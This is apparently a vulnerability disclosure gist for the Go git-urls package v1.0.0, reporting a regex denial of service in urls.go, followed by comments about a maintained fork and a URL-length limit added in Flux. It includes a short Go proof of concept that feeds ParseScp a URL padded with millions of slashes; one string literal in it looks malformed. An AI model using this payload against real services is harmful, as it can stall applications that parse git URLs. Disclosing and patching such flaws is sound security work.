Security issue in regex inside git-urls package

gistfile1.txt

[NAME OF AFFECTED PRODUCT(S)]

  - https://pkg.go.dev/github.com/whilp/git-urls v1.0.0

[AFFECTED AND/OR FIXED VERSION(S)]

  - v1.0.0
  - Status: not fixed

[VULNERABILITY] 

  - Regex Denial of Service

[DESCRIPTION]

The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside 
directory path of the git url. 
It is possible to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:

var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay
malicious_url := "6en6ar@-:0////" + payload + "\"
begin := time.Now()
//u, err := giturls.ParseScp("remote_username@10.10.0.2:/remote/directory")// normal git url
_, err := giturls.ParseScp(malicious_url)
if err != nil {
fmt.Errorf("[ - ] Error ->" + err.Error())
}
//fmt.Println("[ + ] Url --> " + u.Host)
elapse := time.Since(begin)
fmt.Printf("Function took %s", elapse)

This vulnerbale regex causes the application to take longer time in parsing the input.

There is no version 1.0.1 of the git-urls library.

Thanks for noticing. I updated the version in the description.

@makkes We've moved the repo to our organization and fixed the current issue. Please, check https://github.com/chainguard-dev/git-urls.

Thanks for the heads-up, @hectorj2f! Is the goal to keep maintaining the lib there or just as long as a fix version hasn't been released upstream?

As a side note, we fixed it in Flux by limiting the URL string we pass to git-urls to a 2048 bytes.

Yes, we'll keep maintaining our copy independently of what upstream repo does. It currently looks unmaintained for the moment.